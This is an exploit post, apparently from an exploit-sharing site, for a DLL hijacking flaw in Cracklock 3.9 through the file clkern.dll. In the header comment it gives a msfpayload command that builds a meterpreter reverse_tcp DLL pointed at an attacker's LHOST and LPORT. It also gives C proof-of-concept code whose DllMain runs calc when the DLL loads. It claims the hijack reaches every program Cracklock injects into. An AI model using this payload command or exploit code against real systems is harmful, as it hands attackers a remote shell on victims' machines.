facebook facebook twitter rss

Cracklock 3.9 DLL Hijacking

Author: VH4Ck , Published: 03-05-2015
/*

#[+] Author: VH4Ck

#[+] Exploit Title: Cracklock 3.9 DLL Hijacking

#[+] Date: 2/5/2015

#[+] Vendor : http://download.cnet.com/Cracklock/3000-2094_4-10798254.html

#[+] Tested on: Windows XpSP3

#[+]Vulnerable DLL---> clkern.dll

#[+]Make dll payload with metasploit:> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > clkern.dll

#[+] GR33TZ : To Bedo Mado and all my friends

#[+] facebook : www.facebook.com/karim.shoair

#[+] How Danger It this vulnerability?
-Cracklock has Injected the infected dll in all programs to control it's time so that we can say that the whole programs at the system infected with dll hijacking like notepad/paint/winrar/kmplayer/media player...etc

*/

Proof of Concept (PoC):
============================

#include <windows.h>

int evil() {

MessageBoxA(0, "Calculator will open now", "Cracklock V3.9 DLL Hijacking Bug", MB_OK);

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) {

evil();
return 0;

}

Like us on Facebook :